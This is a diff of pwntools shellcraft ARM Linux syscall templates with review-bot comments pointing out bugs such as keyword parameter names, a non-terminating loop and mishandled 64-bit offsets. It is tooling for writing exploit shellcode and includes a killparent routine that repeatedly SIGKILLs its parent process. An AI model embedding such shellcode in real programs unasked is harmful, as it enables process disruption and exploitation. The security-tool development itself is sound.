num + turn_on(int): turn_on + + + ${syscall('SYS_ioperm', from, num, turn_on)} diff --git a/pwnlib/shellcraft/templates/arm/linux/iopl.asm b/pwnlib/shellcraft/templates/arm/linux/iopl.asm new file mode 100644 index 000000000..b1e2e833b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/iopl.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="level"/> +<%docstring> +Invokes the syscall iopl. See 'man 2 iopl' for more information. + +Arguments: + level(int): level + + + ${syscall('SYS_iopl', level)} 
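Review bot: `SYS_gtty` is not an implemented Linux syscall — number 32 is wired to `sys_ni_syscall` wherever it is defined, and ARM only lists it for OABI — so `${syscall('SYS_gtty', fd, params)}` can only return ENOSYS, or fail to resolve the constant on an EABI build. Either drop this generated template or add a docstring line such as `This syscall is not implemented by Linux and always returns -ENOSYS.` so users are not misled.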
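Review bot: `from` is a Python keyword, and Mako compiles `<%page args="from, num, turn_on"/>` into a Python function signature, so this template raises a SyntaxError at load time (the call `${syscall('SYS_ioperm', from, num, turn_on)}` is invalid for the same reason). Rename it, e.g. `<%page args="from_, num, turn_on"/>` and `${syscall('SYS_ioperm', from_, num, turn_on)}`, and update the `Arguments:` entry to match. Separately, ARM has no port I/O and ioperm/iopl are unimplemented (`sys_ni_syscall`, OABI-only) in the ARM table, so this template and the sibling iopl one will only ever return ENOSYS; a docstring caveat would help there too.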
diff --git a/pwnlib/shellcraft/templates/arm/linux/kill.asm b/pwnlib/shellcraft/templates/arm/linux/kill.asm new file mode 100644 index 000000000..f4e625ed7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/kill.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, sig"/> +<%docstring> +Invokes the syscall kill. See 'man 2 kill' for more information. + +Arguments: + pid(pid_t): pid + sig(int): sig + + + ${syscall('SYS_kill', pid, sig)} diff --git a/pwnlib/shellcraft/templates/arm/linux/killparent.asm b/pwnlib/shellcraft/templates/arm/linux/killparent.asm new file mode 100644 index 000000000..8b487fc6e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/killparent.asm @@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.arm.linux import getppid, kill + from pwnlib.constants import SIGKILL + from pwnlib.shellcraft.common import label +%> +<%docstring> +Kills its parent process until whatever the parent is (probably init) +cannot be killed any longer. + +<% + killparent_loop = label('killparent') +%> +${killparent_loop}: + ${getppid()} + ${kill('r0', SIGKILL)} + cmp r0, r0 + beq ${killparent_loop} diff --git a/pwnlib/shellcraft/templates/arm/linux/lchown.asm b/pwnlib/shellcraft/templates/arm/linux/lchown.asm new file mode 100644 index 000000000..503311f07 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/lchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall lchown. See 'man 2 lchown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_lchown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/arm/linux/link.asm b/pwnlib/shellcraft/templates/arm/linux/link.asm new file mode 100644 index 000000000..9380c3d12 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/link.asm 
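Review bot: The loop in `killparent` never terminates: `cmp r0, r0` always sets Z, so `beq ${killparent_loop}` is taken unconditionally regardless of whether the `kill` succeeded, which contradicts the docstring's "until whatever the parent is ... cannot be killed any longer". The raw syscall returns 0 on success and a negative errno on failure, so the test should be on the return value: replace `cmp r0, r0` with `cmp r0, #0` and keep the existing `beq ${killparent_loop}`. Note that `getppid` also clobbers r0, so the comparison must stay immediately after the `kill` as it is now.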
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall link. See 'man 2 link' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_link', from, to)} diff --git a/pwnlib/shellcraft/templates/arm/linux/linkat.asm b/pwnlib/shellcraft/templates/arm/linux/linkat.asm new file mode 100644 index 000000000..4e3c05b60 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/linkat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fromfd, from, tofd, to, flags"/> +<%docstring> +Invokes the syscall linkat. See 'man 2 linkat' for more information. + +Arguments: + fromfd(int): fromfd + from(char): from + tofd(int): tofd + to(char): to + flags(int): flags + + + ${syscall('SYS_linkat', fromfd, from, tofd, to, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/listen.asm b/pwnlib/shellcraft/templates/arm/linux/listen.asm new file mode 100644 index 000000000..b06e8c05b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/listen.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, n"/> +<%docstring> +Invokes the syscall listen. See 'man 2 listen' for more information. + +Arguments: + fd(int): fd + n(int): n + + + ${syscall('SYS_listen', fd, n)} diff --git a/pwnlib/shellcraft/templates/arm/linux/lseek.asm b/pwnlib/shellcraft/templates/arm/linux/lseek.asm new file mode 100644 index 000000000..5fab4d5c1 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/lseek.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, offset, whence"/> +<%docstring> +Invokes the syscall lseek. See 'man 2 lseek' for more information. + +Arguments: + fd(int): fd + offset(off_t): offset + whence(int): whence + + + ${syscall('SYS_lseek', fd, offset, whence)} 
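Review bot: `from` is a reserved word in Python, so `<%page args="from, to"/>` and `${syscall('SYS_link', from, to)}` produce a SyntaxError when Mako compiles the `link` template. Rename the parameter, e.g. `<%page args="from_, to"/>` with `${syscall('SYS_link', from_, to)}`, and change the docstring entry to `from_(char): from_` so the generated documentation matches.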
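Review bot: The `linkat` template uses `from` as a parameter in `<%page args="fromfd, from, tofd, to, flags"/>`, which Mako turns into an invalid Python signature, so the template cannot be rendered. `<%page args="fromfd, from_, tofd, to, flags"/>` together with `${syscall('SYS_linkat', fromfd, from_, tofd, to, flags)}` fixes it; adjust the `Arguments:` entry accordingly.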
diff --git a/pwnlib/shellcraft/templates/arm/linux/lstat.asm b/pwnlib/shellcraft/templates/arm/linux/lstat.asm new file mode 100644 index 000000000..634a379ce --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/lstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat. See 'man 2 lstat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_lstat', file, buf)} diff --git a/pwnlib/shellcraft/templates/arm/linux/lstat64.asm b/pwnlib/shellcraft/templates/arm/linux/lstat64.asm new file mode 100644 index 000000000..616df819c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/lstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat64. See 'man 2 lstat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_lstat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/arm/linux/madvise.asm b/pwnlib/shellcraft/templates/arm/linux/madvise.asm new file mode 100644 index 000000000..09ddfc066 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/madvise.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, length, advice"/> +<%docstring> +Invokes the syscall madvise. See 'man 2 madvise' for more information. + +Arguments: + addr(void): addr + len(size_t): len + advice(int): advice + + + ${syscall('SYS_madvise', addr, length, advice)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mincore.asm b/pwnlib/shellcraft/templates/arm/linux/mincore.asm new file mode 100644 index 000000000..111cee4bf --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mincore.asm 
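Review bot: The `madvise` docstring documents a parameter `len` that does not exist: the page args and the call use `length` (`<%page args="addr, length, advice"/>` and `${syscall('SYS_madvise', addr, length, advice)}`). Change the entry to `length(size_t): length` so the generated docs match the signature.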
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="start, len, vec"/> +<%docstring> +Invokes the syscall mincore. See 'man 2 mincore' for more information. + +Arguments: + start(void): start + len(size_t): len + vec(unsigned): vec + + + ${syscall('SYS_mincore', start, len, vec)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mkdir.asm b/pwnlib/shellcraft/templates/arm/linux/mkdir.asm new file mode 100644 index 000000000..d2cf88c23 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mkdir.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="path, mode"/> +<%docstring> +Invokes the syscall mkdir. See 'man 2 mkdir' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdir', path, mode)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mkdirat.asm b/pwnlib/shellcraft/templates/arm/linux/mkdirat.asm new file mode 100644 index 000000000..8aab83489 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mkdirat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, path, mode"/> +<%docstring> +Invokes the syscall mkdirat. See 'man 2 mkdirat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdirat', fd, path, mode)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mknod.asm b/pwnlib/shellcraft/templates/arm/linux/mknod.asm new file mode 100644 index 000000000..a7be8158b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mknod.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="path, mode, dev"/> +<%docstring> +Invokes the syscall mknod. See 'man 2 mknod' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknod', path, mode, dev)} 
diff --git a/pwnlib/shellcraft/templates/arm/linux/mknodat.asm b/pwnlib/shellcraft/templates/arm/linux/mknodat.asm new file mode 100644 index 000000000..1e5c3a2d8 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mknodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, path, mode, dev"/> +<%docstring> +Invokes the syscall mknodat. See 'man 2 mknodat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknodat', fd, path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mlock.asm b/pwnlib/shellcraft/templates/arm/linux/mlock.asm new file mode 100644 index 000000000..8a1e8f2bb --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall mlock. See 'man 2 mlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_mlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mlockall.asm b/pwnlib/shellcraft/templates/arm/linux/mlockall.asm new file mode 100644 index 000000000..cca6484a3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall mlockall. See 'man 2 mlockall' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_mlockall', flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mmap.asm b/pwnlib/shellcraft/templates/arm/linux/mmap.asm new file mode 100644 index 000000000..f7d9d1f23 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mmap.asm 
@@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, length, prot=7, flags=0x22, fd=-1, offset=0"/> +<%docstring> +Invokes the syscall mmap. See 'man 2 mmap' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + flags(int): flags + fd(int): fd + offset(off_t): offset + + + ${syscall('SYS_mmap2', addr, length, prot, flags, fd, offset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mprotect.asm b/pwnlib/shellcraft/templates/arm/linux/mprotect.asm new file mode 100644 index 000000000..e9d9ba289 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mprotect.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, length, prot"/> +<%docstring> +Invokes the syscall mprotect. See 'man 2 mprotect' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + + + ${syscall('SYS_mprotect', addr, length, prot)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mq_notify.asm b/pwnlib/shellcraft/templates/arm/linux/mq_notify.asm new file mode 100644 index 000000000..2b325d499 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mq_notify.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="mqdes, notification"/> +<%docstring> +Invokes the syscall mq_notify. See 'man 2 mq_notify' for more information. + +Arguments: + mqdes(mqd_t): mqdes + notification(sigevent): notification + + + ${syscall('SYS_mq_notify', mqdes, notification)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mq_open.asm b/pwnlib/shellcraft/templates/arm/linux/mq_open.asm new file mode 100644 index 000000000..7a9f3a694 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mq_open.asm 
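Review bot: The `mmap` template issues `SYS_mmap2` while its docstring says it invokes `mmap` with a plain `offset(off_t)`; mmap2's last argument is in 4096-byte units rather than bytes (see `man 2 mmap2`), so a caller passing a byte offset gets the wrong mapping. The non-obvious defaults `prot=7`, `flags=0x22`, `fd=-1` are also undocumented. Suggest expanding the docstring, e.g. `offset(off_t): offset in 4096-byte pages (this is mmap2)`, `prot(int): protection, defaults to PROT_READ|PROT_WRITE|PROT_EXEC (7)` and `flags(int): defaults to MAP_PRIVATE|MAP_ANONYMOUS (0x22)`; the flag values match the generic Linux ABI but are worth confirming for ARM.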
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name, oflag, vararg"/> +<%docstring> +Invokes the syscall mq_open. See 'man 2 mq_open' for more information. + +Arguments: + name(char): name + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_mq_open', name, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mq_timedreceive.asm b/pwnlib/shellcraft/templates/arm/linux/mq_timedreceive.asm new file mode 100644 index 000000000..d04d8b158 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mq_timedreceive.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedreceive. See 'man 2 mq_timedreceive' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedreceive', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mq_timedsend.asm b/pwnlib/shellcraft/templates/arm/linux/mq_timedsend.asm new file mode 100644 index 000000000..0442539ba --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mq_timedsend.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedsend. See 'man 2 mq_timedsend' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedsend', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mq_unlink.asm b/pwnlib/shellcraft/templates/arm/linux/mq_unlink.asm new file mode 100644 index 000000000..300fbb376 --- /dev/null 
+++ b/pwnlib/shellcraft/templates/arm/linux/mq_unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall mq_unlink. See 'man 2 mq_unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_mq_unlink', name)} diff --git a/pwnlib/shellcraft/templates/arm/linux/mremap.asm b/pwnlib/shellcraft/templates/arm/linux/mremap.asm new file mode 100644 index 000000000..2728bb9ed --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/mremap.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, old_len, new_len, flags, vararg"/> +<%docstring> +Invokes the syscall mremap. See 'man 2 mremap' for more information. + +Arguments: + addr(void): addr + old_len(size_t): old_len + new_len(size_t): new_len + flags(int): flags + vararg(int): vararg + + + ${syscall('SYS_mremap', addr, old_len, new_len, flags, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/msync.asm b/pwnlib/shellcraft/templates/arm/linux/msync.asm new file mode 100644 index 000000000..c3a35e95b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/msync.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, len, flags"/> +<%docstring> +Invokes the syscall msync. See 'man 2 msync' for more information. + +Arguments: + addr(void): addr + len(size_t): len + flags(int): flags + + + ${syscall('SYS_msync', addr, len, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/munlock.asm b/pwnlib/shellcraft/templates/arm/linux/munlock.asm new file mode 100644 index 000000000..6bb6c75ce --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/munlock.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munlock. See 'man 2 munlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/munlockall.asm b/pwnlib/shellcraft/templates/arm/linux/munlockall.asm new file mode 100644 index 000000000..c47fb95b5 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/munlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall munlockall. See 'man 2 munlockall' for more information. + +Arguments: + + + + ${syscall('SYS_munlockall')} diff --git a/pwnlib/shellcraft/templates/arm/linux/munmap.asm b/pwnlib/shellcraft/templates/arm/linux/munmap.asm new file mode 100644 index 000000000..5db211e74 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/munmap.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr, length"/> +<%docstring> +Invokes the syscall munmap. See 'man 2 munmap' for more information. + +Arguments: + addr(void): addr + length(size_t): length + + + ${syscall('SYS_munmap', addr, length)} diff --git a/pwnlib/shellcraft/templates/arm/linux/nanosleep.asm b/pwnlib/shellcraft/templates/arm/linux/nanosleep.asm new file mode 100644 index 000000000..541861c3e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/nanosleep.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="requested_time, remaining"/> +<%docstring> +Invokes the syscall nanosleep. See 'man 2 nanosleep' for more information. + +Arguments: + requested_time(timespec): requested_time + remaining(timespec): remaining + + + ${syscall('SYS_nanosleep', requested_time, remaining)} 
diff --git a/pwnlib/shellcraft/templates/arm/linux/nice.asm b/pwnlib/shellcraft/templates/arm/linux/nice.asm new file mode 100644 index 000000000..a848f1b3d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/nice.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="inc"/> +<%docstring> +Invokes the syscall nice. See 'man 2 nice' for more information. + +Arguments: + inc(int): inc + + + ${syscall('SYS_nice', inc)} diff --git a/pwnlib/shellcraft/templates/arm/linux/open.asm b/pwnlib/shellcraft/templates/arm/linux/open.asm new file mode 100644 index 000000000..a60f58be1 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, oflag, vararg"/> +<%docstring> +Invokes the syscall open. See 'man 2 open' for more information. + +Arguments: + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_open', file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/openat.asm b/pwnlib/shellcraft/templates/arm/linux/openat.asm new file mode 100644 index 000000000..11ebe4a60 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/openat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, file, oflag, vararg"/> +<%docstring> +Invokes the syscall openat. See 'man 2 openat' for more information. + +Arguments: + fd(int): fd + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_openat', fd, file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/pause.asm b/pwnlib/shellcraft/templates/arm/linux/pause.asm new file mode 100644 index 000000000..a0f743dd8 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/pause.asm 
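Review bot: `open` requires a third positional `vararg` even though the mode is only consulted when `oflag` includes O_CREAT, so the common two-argument call will raise for a missing argument. A default keeps any existing callers working and matches the libc prototype: `<%page args="file, oflag, vararg=0"/>`, with the docstring entry reading `vararg(int): mode, only used with O_CREAT`. The `openat` template in this series has the same shape and could take `vararg=0` as well.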
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall pause. See 'man 2 pause' for more information. + +Arguments: + + + + ${syscall('SYS_pause')} diff --git a/pwnlib/shellcraft/templates/arm/linux/pipe.asm b/pwnlib/shellcraft/templates/arm/linux/pipe.asm new file mode 100644 index 000000000..5952b3711 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/pipe.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pipedes"/> +<%docstring> +Invokes the syscall pipe. See 'man 2 pipe' for more information. + +Arguments: + pipedes(int): pipedes + + + ${syscall('SYS_pipe', pipedes)} diff --git a/pwnlib/shellcraft/templates/arm/linux/pipe2.asm b/pwnlib/shellcraft/templates/arm/linux/pipe2.asm new file mode 100644 index 000000000..631f314a0 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/pipe2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pipedes, flags"/> +<%docstring> +Invokes the syscall pipe2. See 'man 2 pipe2' for more information. + +Arguments: + pipedes(int): pipedes + flags(int): flags + + + ${syscall('SYS_pipe2', pipedes, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/poll.asm b/pwnlib/shellcraft/templates/arm/linux/poll.asm new file mode 100644 index 000000000..870c062ad --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/poll.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fds, nfds, timeout"/> +<%docstring> +Invokes the syscall poll. See 'man 2 poll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(int): timeout + + + ${syscall('SYS_poll', fds, nfds, timeout)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ppoll.asm b/pwnlib/shellcraft/templates/arm/linux/ppoll.asm new file mode 100644 index 000000000..21f816986 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ppoll.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fds, nfds, timeout, ss"/> +<%docstring> +Invokes the syscall ppoll. See 'man 2 ppoll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(timespec): timeout + ss(sigset_t): ss + + + ${syscall('SYS_ppoll', fds, nfds, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/arm/linux/prctl.asm b/pwnlib/shellcraft/templates/arm/linux/prctl.asm new file mode 100644 index 000000000..33b93fc2b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/prctl.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="option, *vararg"/> +<%docstring> +Invokes the syscall prctl. See 'man 2 prctl' for more information. + +Arguments: + option(int): option + vararg(int): vararg + + + ${syscall('SYS_prctl', option, *vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/pread.asm b/pwnlib/shellcraft/templates/arm/linux/pread.asm new file mode 100644 index 000000000..f9bf4d1da --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/pread.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, buf, nbytes, offset"/> +<%docstring> +Invokes the syscall pread. See 'man 2 pread' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + offset(off_t): offset + + + ${syscall('SYS_pread', fd, buf, nbytes, offset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/preadv.asm b/pwnlib/shellcraft/templates/arm/linux/preadv.asm new file mode 100644 index 000000000..9074e9436 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/preadv.asm 
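Review bot: The raw `ppoll` system call takes a fifth argument, `sigsetsize`, which the kernel validates against its sigset size whenever `ss` is non-NULL (see the NOTES section of `man 2 ppoll`); `${syscall('SYS_ppoll', fds, nfds, timeout, ss)}` leaves r4 at whatever value it had, so calls with a signal mask get EINVAL or pass garbage. Add the parameter, e.g. `<%page args="fds, nfds, timeout, ss, sigsetsize=8"/>` and `${syscall('SYS_ppoll', fds, nfds, timeout, ss, sigsetsize)}`; 8 is the kernel sigset size on 32-bit ARM, worth confirming.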
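Review bot: On 32-bit ARM EABI the offset of `pread64` is a 64-bit value passed in an aligned register pair (r4:r5, with r3 left as padding), so `${syscall('SYS_pread', fd, buf, nbytes, offset)}` places the offset where the kernel expects padding and the effective offset is whatever r4:r5 hold. I also cannot confirm a `SYS_pread` constant exists for ARM (the kernel name is `pread64`). Unless the `syscall` helper splits 64-bit arguments (not visible here), document the limitation or take the offset as an explicit low/high pair.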
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall preadv. See 'man 2 preadv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_preadv', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/prlimit64.asm b/pwnlib/shellcraft/templates/arm/linux/prlimit64.asm new file mode 100644 index 000000000..3ef67d9aa --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/prlimit64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, resource, new_limit, old_limit"/> +<%docstring> +Invokes the syscall prlimit64. See 'man 2 prlimit64' for more information. + +Arguments: + pid(pid_t): pid + resource(rlimit_resource): resource + new_limit(rlimit64): new_limit + old_limit(rlimit64): old_limit + + + ${syscall('SYS_prlimit64', pid, resource, new_limit, old_limit)} diff --git a/pwnlib/shellcraft/templates/arm/linux/profil.asm b/pwnlib/shellcraft/templates/arm/linux/profil.asm new file mode 100644 index 000000000..3150b8c07 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/profil.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="sample_buffer, size, offset, scale"/> +<%docstring> +Invokes the syscall profil. See 'man 2 profil' for more information. + +Arguments: + sample_buffer(unsigned): sample_buffer + size(size_t): size + offset(size_t): offset + scale(unsigned): scale + + + ${syscall('SYS_profil', sample_buffer, size, offset, scale)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ptrace.asm b/pwnlib/shellcraft/templates/arm/linux/ptrace.asm new file mode 100644 index 000000000..94279dbc0 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ptrace.asm 
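Review bot: The raw `preadv` system call takes the offset split into two arguments, `pos_l` and `pos_h` (see NOTES in `man 2 preadv`), so `${syscall('SYS_preadv', fd, iovec, count, offset)}` leaves `pos_h` unset and the effective offset is undefined. Either pass both halves, e.g. `<%page args="fd, iovec, count, offset, offset_hi=0"/>` with `${syscall('SYS_preadv', fd, iovec, count, offset, offset_hi)}`, or state in the docstring that `offset` is only the low 32 bits. The `pwritev` template in this series has the same issue.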
